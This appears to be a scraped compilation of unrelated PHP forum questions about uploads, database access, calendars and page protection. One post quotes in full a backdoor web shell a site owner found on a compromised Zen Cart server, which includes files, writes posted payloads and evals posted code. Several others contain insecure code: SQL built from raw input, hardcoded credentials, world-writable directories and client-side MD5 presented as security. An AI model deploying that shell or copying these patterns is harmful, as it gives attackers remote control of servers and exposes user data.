PHP - Protecting Your Code On A 3rd Party Server?

Hello

I recently got a "to many connection" error on my site, and want to know if anyone here knows a few codes
that will show how many connection currently are in use (maybe even what files that creates them).

I found I can use "Threads_connected" to show current open connections, but no info on how to write the code or where to pu the
file.

I hope you can show my what to do

Hello,

I have a form for uploading CV files into a CV database.

Once the files are uploaded to their directory (e.g. www.jobsboard.com/cvdatabase/) please could someone tell me how to restrict access to users?

e.g. once a user logs into their userpanel they should be able to click on a hyperlink to download a CV e.g. (www.jobsboard.com/cvdatabase/CV1.doc) but a user who isn't logged in shouldn't be able to access www.jobsboard.com/cvdatabase/CV1.doc

Please could you tell me whether this is possible?

Many thanks,

Stu

I am trying to get a php script on a remote server to execute on my server but im having problems getting it to work, and i am not sure if it is even feasible
i have had a look on google but i cant find much information on it.

This is what i have tried up to now

I saved a php script as a txt file on y remote server.
then used file_get_contents on my home server

$curl_scraped_page = file_get_contents('http://www.remote_server.com/script.txt');

the content of the txt file was

$sum = 1+1;

then i tried to echo $sum on the home server but i did not work can anyone point me in the right direction or is what i am trying to do even feasible?

Thanks in advanced

I hope I'm posting in the correct forum.  If not, I'm super sorry!
Anyways, I need help with a website I'm working on.  We have been asked to redesign our "Apply Online" page.  My supervisor has asked that I find the correct code to make an upload button that will allow users to upload their resumes to our server, and send a copy to the specific branch they indicate (we have 17 branches).  Could any of you point me in the correct direction for this code?  I've seen several sites for Uploads to servers, but I'm worried this isn't exactly what we are looking for.

Hello everyone.. This is the first PHP script I've written and was hoping to get some feedback on any possible issues with it. I've pieced this together in an attempt to download remote images and store them on my server, instead of hotlinking images. The code will be used for a forum, called up by a BBCode tag. (The user will place an image URL into the BBCode, which will transfer to this PHP script). Again, this is the first time I've coded anything in PHP and was hoping to get some pointers on anything that needs changing.. thanks


<?php

$url = $_GET['url'];
$url_path = parse_url($url, PHP_URL_PATH);
$name = basename($url_path);
$FileExt= substr($name, -3); 
$FileTypeMIME= array("jpg" => "image/jpeg",
                         "png" => "image/png",
                         "gif" => "image/gif");

$ContentType= $FileTypeMIME[$FileExt];
if (empty($ContentType)) die("You are not allowed to access this file!");

header("Content-Type: " . $ContentType); 

$save = "../images/". strtolower($name); 

function wtf_image ($file) {
    switch($FileTypeMIME[$FileExt]){
        case "image/jpeg":
            $im = imagecreatefromjpeg($file); //jpeg file
       imagejpeg($im, $save, 0, NULL);   //save jpeg file 
        break;
        case "image/gif":
            $im = imagecreatefromgif($file); //gif file
       imagegif($im, $save, 0, NULL);   //save gif file
      break;
      case "image/png":
          $im = imagecreatefrompng($file); //png file
     imagePNG($im, $save, 0, NULL);   //save png file
      break;
    }
    return $im;
}

if (file_exists($save)) { 
readfile($save);  
} else { 
chmod($save,0755); 
$image = wtf_image($url);
//Runs wtf_image function on $url
imagedestroy($image);   
readfile($save); 
} 
?>

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

I have a script that runs periodically by a launchd timer. I give the script a very tight timeout ( set_time_limit(120); ). 

Most of the time, my script works great. But every once in a while, one of the commands I run in an exec( ) call seems to hang. This of course is a problem because once the exec( ) call hangs, the php script hangs as time spent on exec( ) calls does not count towards the script's runtime. 

Furthermore since the script is still running, launchd doesn't call it again. So in this way, my script is entirely at the mercy of a command line program not having a problem. And if it does, I can't do anything about it.  

So while I could try to figure out why my particular command seems to go awry (which is its own weird issue), the bigger issue is how can I call command line programs in php in a way that don't allow a runaway command to lock up the whole script forever? I wish there was an exec( )-type function with timeout built in. Or even a script timelimit function that DID count pauses and external programs. Something to kill this!? Something other than a SECOND php script that would check on the first script and kill it when there is a problem. There MUST be a better solution than that?

Any thoughts?

Hi,

I was asked to create an app, wherein, the user may enter the email addresses of people manually, and it auto generates a random key.
now this key will be used access such pages e.g

proposal.test.com/ppc
proposal.test.com/seo
proposal.test.com/design

so using the key for example =>  Sa22asdf 
it should appear like this

proposal.test.com/ppc/Sa22asdf
proposal.test.com/seo/Sa22asdf
proposal.test.com/design/Sa22asdf


without the unique key generated during the input of email address, the URL mentioned shouldn't be accessed by anyone..
now my question is, how to approach this thing in PHP ?

I have done the input for email address and generation of random keys., but i don't know yet what to do or how to do the
securing of pages using those keys  ? 

Hi All,

I'm trying to secure my web app which is currently in development, and came across this issue.

I have a header.php and footer.php page which are included to every page, with the content in the middle. The problem is, if you visit header.php then it displays the header, with some blank text.

What is the best way to protect this - i.e., if visited directly, it re-directs to index.php etc.

My initial thought is to set a $happylink on each page and in the header and footer, checking basically doing the following


if (isset($happylink) && !empty($happylink))
{
     blah blah;
}
else
{
     Header("Location: index.php");
}

Would that be the best way? Is there something easier?

Data siphoning is becoming more common every day, Data siphoning is when you intercept the data and sniff between a client and a host, also known as sniffing a connection. ( i am focusing on session hijack)   To protect clients I've decided to write an MD5 calculation function which changes a secure string (such as a password) to plain MD5   Then once the MD5_password reaches PHP i BCRYPT with cost 20 using password_hash _   MD5 is not ideal at all and i would like to write a better encryption but i only know how to do MD5 for java script, but i really don't need that much security here. the purpose is to not show sensitive information, that's going to be hashed on the server, during a data siphon attack. _   Data siphoning can not be protected against on the host server, the siphoning happens on the clients side usually when they don't have a strong firewall or such.     What are some good techniques you would practice to protect from data siphoning?       Before added security i was able to siphon this:  Username: Richard Password: mypassword   After added security i was able to siphon this:  Username: 6ae199a93c381bf6d5de27491139d3f9 Password: 5f4dcc3b5aa765d61d8327deb882cf99     Now the only vulnerability between the client and server is if the hacker dns hacks the client which could redirect them to a website that looks like mine with the same EXACT url. which i can't help.   The real username can be retrieved in a session on login.     The real username and password can be found if a hacker injects js to remove the MD5 function, so if you know how to detect JavaScript injection i would like to know that as well.     ______ Pretty much it looks like this..   Form -> Send md5(username) & md5(password) -> Server check if match in datbase -> If so login.                                                                                 ^ cypher                                                               ^cypher (session)
Edited by Richard_Grant, 12 September 2014 - 03:27 AM.

This topic has been moved to Miscellaneous.

http://www.phpfreaks.com/forums/index.php?topic=321861.0

To access MySql tables from PHP, I use the PHP code and the function below.

If I make these changes, would this code work for SQL Server 2008?

   mysql_fetch_array to mssql_fetch_array
   mysql_connect     to mssql_connect
   mysql_select_db   to mssql_select_db
   mysql_query       to mssql_query



PHP code
--------------------------------------------------------------------------------
$sql = "SELECT mast_id FROM district_mast WHERE mast_district = '".$dist_num."'";
$result = func_table_access($sql);
$rows = mysql_fetch_array($result);



Function
--------------------------------------------------------------------------------
FUNCTION func_table_access($sql)  {
  $db   = "aplustutoru";
  $host = "localhost";
  $user = "root";
  $pass = "";

  IF (!($conn=mysql_connect($host, $user, $pass))) {
    PRINTF("error connecting to DB by user = $user and pwd=$pass");
    EXIT;
    }

  $db3 = MYSQL_SELECT_DB($db,$conn) or die("Unable to connect to local database");
  IF ($sql <> "justopendb") {
    $result = MYSQL_QUERY($sql) OR DIE ("Can not run query because ". MYSQL_ERROR());
    RETURN $result;
    }
  }
                         

Hi guys,

this is the geocoding part of the code.

I ran this ion my localhost and it runs ok. Then when i uploaded it to my server i got

500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.

When i take out the php the html code run ok... so its not that. Can anyone help?

I have taken out my key and db connection.

Im hosted on black knight if thats any help

Code: [Select]
<?php
require("config.php");

define("MAPS_HOST", "maps.google.com");
define("KEY", "****");

// Opens a connection to a MySQL server
$connection = mysql_connect("localhost", "root", "password");
if (!$connection) {
  die("Not connected : " . mysql_error());
}

// Set the active MySQL database
$db_selected = mysql_select_db("database", $connection);
if (!$db_selected) {
  die("Can\'t use db : " . mysql_error());
}

// Select all the rows in the markers table
$query = "SELECT * FROM users WHERE 1";
$result = mysql_query($query);
if (!$result) {
  die("Invalid query: " . mysql_error());
}

// Initialize delay in geocode speed
$delay = 0;
$base_url = "http://" . MAPS_HOST . "/maps/geo?output=xml" . "&key=" . KEY;

// Iterate through the rows, geocoding each address
while ($row = @mysql_fetch_assoc($result)) {
  $geocode_pending = true;

  while ($geocode_pending) {
    $address = $row["address1"];
    $id = $row["id"];
    $request_url = $base_url . "&q=" . urlencode($address);
    $xml = simplexml_load_file($request_url) or die("url not loading");

    $status = $xml->Response->Status->code;
    if (strcmp($status, "200") == 0) {
      // Successful geocode
      $geocode_pending = false;
      $coordinates = $xml->Response->Placemark->Point->coordinates;
      $coordinatesSplit = explode(",", $coordinates);
      // Format: Longitude, Latitude, Al
  itude
      $lat = $coordinatesSplit[1];
      $lng = $coordinatesSplit[0];

      $query = sprintf("UPDATE users " .
             " SET lat = '%s', lng = '%s' " .
             " WHERE id = '%s' LIMIT 1;",
             mysql_real_escape_string($lat),
             mysql_real_escape_string($lng),
             mysql_real_escape_string($id));
      $update_result = mysql_query($query);
      if (!$update_result) {
        die("Invalid query: " . mysql_error());
      }
    } else if (strcmp($status, "620") == 0) {
      // sent geocodes too fast
      $delay += 100000;
    } else {
      // failure to geocode
      $geocode_pending = false;
      echo "Address " . $address . " failed to geocoded. ";
      echo "Received status " . $status . "
\n";
    }
    usleep($delay);
  }
}
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Your Profile Page</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="css/1.css" type="text/css" media="screen,projection" />

</head>
 
<body>

<div id="wrapper" class="fixed">

<div id="header">

<h1>Find A Tag Team</strong></h1>

<ul id="nav">

<li><a href="home.html">Home</a></li>

<li><a href="index.html"></a>Logout</li>

<li><a href="Links.php">Links</a></li>

<li><a href="Videos.php">Videos</a></li>



</ul>

</div>

<div id="sidebar_left">

<h2>Your Profile Page</h2>

<p>


</p>

<p>

From here you can ...<br />
-Edit all your information <br />
-Search for other users <br />
-View any emails you may have recieved</br />

</p>

<p>



</p>

</div>




<div id="content">

<h1>Profile</h1>
<div class ="message"> The map has been succesfully updated. <br />
<a href = "map.php">View the Map</div>

<div id="footer">


</div>
</div>

</body>
</html>

Hi Guys, I am new to this forum. I have tried other forums but with no success. I hope you can answer me.

Project: Job Application Form along with CV upload.
Backend: MySQL.
Problem: When the form is submitted, it replaces the same named file in my server.
Example: When I upload a file named "Example.doc" using this form and if there is already a file named "Example.doc" in the same directory (Server), the new file (example.doc) will replace the old one.
Solution Required: May be,
                              a) When I upload a file, the file name gets renamed with say the personsname+DOB+timestamp.
                              b) Any other solution which will not delete the old files present.

I am pasting the PHP code that I used .... for your kind perusal. Please help:

<?php


// Receiving variables
@$pfw_ip= $_SERVER['REMOTE_ADDR'];
@$Name = addslashes($_POST['Name']);
@$Telephone = addslashes($_POST['Telephone']);
@$Email = addslashes($_POST['Email']);
@$Mobile = addslashes($_POST['Mobile']);
@$CITY = addslashes($_POST['CITY']);
@$OtherLocation = addslashes($_POST['OtherLocation']);
@$PostalAddress = addslashes($_POST['PostalAddress']);
@$Years = addslashes($_POST['Years']);
@$Months = addslashes($_POST['Months']);
@$Lacs = addslashes($_POST['Lacs']);
@$Thousands = addslashes($_POST['Thousands']);
@$FunctionalArea = addslashes($_POST['FunctionalArea']);
@$CurrIndustry = addslashes($_POST['CurrIndustry']);
@$KeySkills = addslashes($_POST['KeySkills']);
@$ResumeTitle = addslashes($_POST['ResumeTitle']);
@$JobID = addslashes($_POST['JobID']);
@$TenthUniv = addslashes($_POST['TenthUniv']);
@$TenthPer = addslashes($_POST['TenthPer']);
@$TwlUniv = addslashes($_POST['TwlUniv']);
@$TwlPer = addslashes($_POST['TwlPer']);
@$UGCOURSE = addslashes($_POST['UGCOURSE']);
@$GradPer = addslashes($_POST['GradPer']);
@$PGCOURSE = addslashes($_POST['PGCOURSE']);
@$PPGCOURSE = addslashes($_POST['PPGCOURSE']);
@$course1 = addslashes($_POST['course1']);
@$course2 = addslashes($_POST['course2']);
@$course3 = addslashes($_POST['course3']);
@$Gender = addslashes($_POST['Gender']);
@$DOB = addslashes($_POST['DOB']);
@$Nationality = addslashes($_POST['Nationality']);
@$select2 = addslashes($_POST['select2']);
@$file_Name = $_FILES['file']['name'];
@$file_Size = $_FILES['file']['size'];
@$file_Temp = $_FILES['file']['tmp_name'];
@$file_Mime_Type = $_FILES['file']['type'];

function RecursiveMkdir($path)
 {
   if (!file_exists($path))
   {
      RecursiveMkdir(dirname($path));
      mkdir($path, 0777);
    }
  }


// Validation
if( $file_Size == 0)
{
die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>");
}
if( $file_Size >50000000)
{
//delete file
unlink($file_Temp);
die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>");
}
if( $file_Mime_Type != "application/msword" AND $file_Mime_Type != "application/pdf" AND $file_Mime_Type != "application/rtf" )
{
unlink($file_Temp);
die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>");
}
$uploadFile =  $file_Name ;
if (!is_dir(dirname($uploadFile)))
  {
    @RecursiveMkdir(dirname($uploadFile));
  }
else
  {
  @chmod(dirname($uploadFile), 0777);
  }
@move_uploaded_file( $file_Temp , $uploadFile);
chmod($uploadFile, 0644);
$file_URL = "http://www.myserver.com/resume/".$file_Name ;

//saving record to MySQL database


@$pfw_strQuery = "INSERT INTO `Candidate_Test`(`Name`,`tel`,`email`,`mob`,`city`,`othr`,`add`,`yrs`,`mon`,`lacs`,`thnd`,`func`,`curr`,`skills`,`title`,`Jobid`,`tenb`,`tenp`,`twlb`,`twlp`,`ugb`,`ugp`,`pg`,`ppg`,`c1`,`c2`,`c3`,`gen`,`dob`,`nation`,`pref`,`file`)VALUES (\"$Name\",\"$Telephone\",\"$Email\",\"$Mobile\",\"$CITY\",\"$OtherLocation\",\"$PostalAddress\",\"$Years\",\"$Months\",\"$Lacs\",\"$Thousands\",\"$FunctionalArea\",\"$CurrIndustry\",\"$KeySkills\",\"$ResumeTitle\",\"$JobID\",\"$TenthUniv\",\"$TenthPer\",\"$TwlUniv\",\"$TwlPer\",\"$UGCOURSE\",\"$GradPer\",\"$PGCOURSE\",\"$PPGCOURSE\",\"$course1\",\"$course2\",\"$course3\",\"$Gender\",\"$DOB\",\"$Nationality\",\"$select2\",\"$file_Name\")" ;
@$pfw_host = "localhost";
@$pfw_user = "testuser";
@$pfw_pw = "ultimate09";
@$pfw_db = "Resumebank";
$pfw_link = mysql_connect($pfw_host, $pfw_user, $pfw_pw);
if (!$pfw_link) {
 die('Could not connect: ' . mysql_error());
}
$pfw_db_selected = mysql_select_db($pfw_db, $pfw_link);
if (!$pfw_db_selected) {
die ('Can not use $pfw_db : ' . mysql_error());
}

//insert new record
$pfw_result = mysql_query($pfw_strQuery);
if (!$pfw_result) {
 die('Invalid query: ' . mysql_error());
}
mysql_close($pfw_link);

 echo("<p align='center'><font face='Arial' size='3' color='#FF0000'>Successful</font></p>");
?>

 --------
PLEASE HELP. URGENTLY REQUIRED!!!!

Sourav Sengupta

I found a tutorial on youtube that would allow me to create a calendar of events. We have the calendar html page: This includes the onload="initialCalendar();" function

<script type="text/javascript">
/* <![CDATA[ */
function initialCalendar(){
    var hr = new XMLHttpRequest();
    var url = "calendar/calendar_start.php";
    var currentTime = new Date ();
    var month = currentTime.getMonth() + 1;
    var year = currentTime.getFullYear();
    showmonth = month;
    showyear = year;
    var vars= "showmonth="+showmonth+"&showyear="+showyear;
    hr.open("POST", url, true);
    hr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    hr.onreadystatechange = function() {
        if (hr.readyState == 4 && hr.status == 200) {
            var return_data = hr.responseText;
                document.getElementById("showCalendar").innerHTML = return_data;
        }
    }
    hr.send(vars);
    document.getElementById("showCalendar"). innerHTML = "processing...";
}
/* ]]> */
</script>

<script type="text/javascript">
/* <![CDATA[ */
function next_month() {
    var nextmonth = showmonth + 1;
    if(nextmonth > 12) {
        nextmonth = 1;
        showyear = showyear+1;
    }
    showmonth = nextmonth;
    var hr = new XMLHttpRequest();
    var url = "calendar/calendar_start.php";
    var vars= "showmonth="+showmonth+"&showyear="+showyear;
    hr.open("POST", url, true);
    hr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    hr.onreadystatechange = function() {
        if (hr.readyState == 4 && hr.status == 200) {
            var return_data = hr.responseText;
                document.getElementById("showCalendar").innerHTML = return_data;
        }
    }
    hr.send(vars);
    document.getElementById("showCalendar"). innerHTML = "processing...";
}
/* ]]> */
</script>

<script type="text/javascript">
/* <![CDATA[ */
function last_month() {
    var lastmonth = showmonth - 1;
    if(lastmonth < 1 ) {
        lastmonth = 12;
        showyear = showyear-1;
    }
    showmonth = lastmonth;
    var hr = new XMLHttpRequest();
    var url = "calendar/calendar_start.php";
    var vars= "showmonth="+showmonth+"&showyear="+showyear;
    hr.open("POST", url, true);
    hr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    hr.onreadystatechange = function() {
        if (hr.readyState == 4 && hr.status == 200) {
            var return_data = hr.responseText;
                document.getElementById("showCalendar").innerHTML = return_data;
        }
    }
    hr.send(vars);
    document.getElementById("showCalendar"). innerHTML = "processing...";
}
/* ]]> */
</script>

<script type="text/javascript">
/* <![CDATA[ */
function overlay() {
    el = document.getElementById("overlay");
    el.style.display = (el.style.display == "block") ? "none" : "block";
    el = document.getElementById("events");
    el.style.display = (el.style.display == "block") ? "none" : "block";
    el = document.getElementById("eventsBody");
    el.style.display = (el.style.display == "block") ? "none" : "block";
}
/* ]]> */
</script>
<script type="text/javascript">
/* <![CDATA[ */
function show_details(theId) {
    var deets = (theId.id);
    el = document.getElementById("overlay");
    el.style.display = (el.style.display == "block") ? "none" : "block";
    el = document.getElementById("events");
    el.style.display = (el.style.display == "block") ? "none" : "block";
    var hr = new XMLHttpRequest();
    var url = "calendar/events_fns.php";
    var vars = "deets="+deets;
    hr.open("POST", url, true);
    hr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    hr.onreadystatechange= function() {
        if (hr.readyState == 4 && hr.status == 200) {
            var return_data = hr.responseText;
                document.getElementById("events").innerHTML = return_data;
        }
    }
    hr.send(vars);
    document.get ElementById("events").innerHTML = "processing...";
}
/* ]]> */
</script>

The script to show to actual calendar is called from here.... calendar_start.php

<?php
$showmonth = $_POST['showmonth'];
$showyear = $_POST['showyear'];

$showmonth= preg_replace('#[^0-9]#i', '', $showmonth);
$showyear= preg_replace('#[^0-9]#i', '', $showyear);

$day_count = cal_days_in_month(CAL_GREGORIAN, $showmonth, $showyear);
$pre_days = date('w', mktime(0,0,0, $showmonth, 1, $showyear));
$post_days = (6-(date('w', mktime(0,0,0, $showmonth, $day_count, $showyear))));

echo '<div id="calendar-wrap">';
	echo '<div class="title-bar">';
		echo '<div class="previous-month"><input name="button" type="submit" value="Previous Month" onClick="javascript:last_month();"></div>';
		echo '<div class="show-month">'  . date('F', mktime(0, 0, 0, $showmonth)) . ' ' . $showyear . '</div>';
		echo '<div class="next-month"><input name="button" type="submit" value="Next Month" onClick="javascript:next_month();"></div>';
	echo '</div>';

	echo '<div class="week_days">';
		echo '<div class="days-of-week">Sun</div>';
		echo '<div class="days-of-week">Mon</div>';
		echo '<div class="days-of-week">Tues</div>';
		echo '<div class="days-of-week">Wed</div>';
		echo '<div class="days-of-week">Thur</div>';
		echo '<div class="days-of-week">Fri</div>';
		echo '<div class="days-of-week">Sat</div>';
		echo '<div class="clear"></div>';
	echo '</div>';

	//Previous Month days
	if ($pre_days != 0) {
		for($i=1; $i<=$pre_days; $i++) {
			echo '<div class="non-cal-days"></div>';
		}
	}

	//Current Month Days
	$conn = mysqli_connect('Databaseconnection Things')
	or die ("Could not connect to the Database");

	    for ($i=1; $i<= $day_count; $i++) {
        //get event logic
        $date = $i.'/'.$showmonth.'/'.$showyear;
        $query = mysqli_query('SELECT calid FROM calendar WHERE caldate = "'.$date.'"') or trigger_error("Query Failed! SQL: $sql - Error: ".mysqli_error($query), E_USER_ERROR);
        $num_rows = mysqli_num_rows($conn, $query);
        if($num_rows > 0) {
            $event = "<input name='$date' type='submit' value='Details' id='$date' onClick='javascript:show_details(this);'>";
        }
        echo '<div class="cal-days">';
        echo '<div class="day-heading">' . $i . '</div>';
        if($num_rows != 0) { echo "<div class='opening'><br/>" . $event . "</div>";}
        echo '</div>';
    }


	//Next Months Days
	if ($post_days !=0) {
		for($i=1; $i<=$post_days; $i++) {
			echo '<div class="non-cal-days"></div>';
		}
	}
echo '</div>';

?>

And events_fns.

<?php

$deets = $_POST['deets'];
$deets = preg_replace('#[^0-9/]#i', '', $deets);

$conn = mysqli_connect("Database Connection")
	or die ("Could not connect to the Database");

$events = '';
$query = mysqli_query('SELECT calid FROM calendar WHERE caldate = "'.$deets.'"') or die ("Error:".mysqli_errno());

//echo "$query";

$num_rows=0;
if ($result = mysqli_query($query,$conn)) {
	$num_rows = mysqli_num_rows($result);
	}


if ($num_rows > 0) {
	$events .= '<div id="eventsControl"><button onMouseDown="overlay()">Close</button><br /><br />'.$deets.'<br /><br /></div>';

	while ($row = mysqli_fetch_array($query)) {
		$title = $row['eventtitle'];
		$desc = $row['description'];
		$loc = $row['eventlocation'];

		$events .='<div id="eventsBody">'.$title.'<br />'.$desc.'<br />'.$loc.'<hr /></div>';
	}
}
echo $events;
?>

I have posted all the code so you can see how it fits together ect ect however the issue I am having is an error message that repeats across the page. it reads: Warning: mysqli_error() expects parameter 1 to be mysqli, boolean given in /home/sites/agile-cms.co.uk/public_html/mfcf/calendar/calendar_start.php on line 49 Fatal error: Query Failed! SQL: - Error: in /home/sites/agile-cms.co.uk/public_html/mfcf/calendar/calendar_start.php on line 49

    for ($i=1; $i<= $day_count; $i++) {
        //get event logic
        $date = $i.'/'.$showmonth.'/'.$showyear;
        $query = mysqli_query($conn, 'SELECT eventid FROM events WHERE eventdate = "'.$date.'"') or trigger_error("Query Failed! SQL: $sql - Error: ".mysqli_error($query), E_USER_ERROR);
        $num_rows = mysqli_num_rows($query);
        if($num_rows > 0) {
            $event = "<input name='$date' type='submit' value='Details' id='$date' onClick='javascript:show_details(this);'>";
        }
        echo '<div class="cal-days">';
        echo '<div class="day-heading">' . $i . '</div>';
        if($num_rows != 0) { echo "<div class='opening'><br/>" . $event . "</div>";}
        echo '</div>';
    }

I think I have missed something being so close to it and I think I need an outside P.O.V to look at it and point me in the right direction.... Any help would be much appreciated....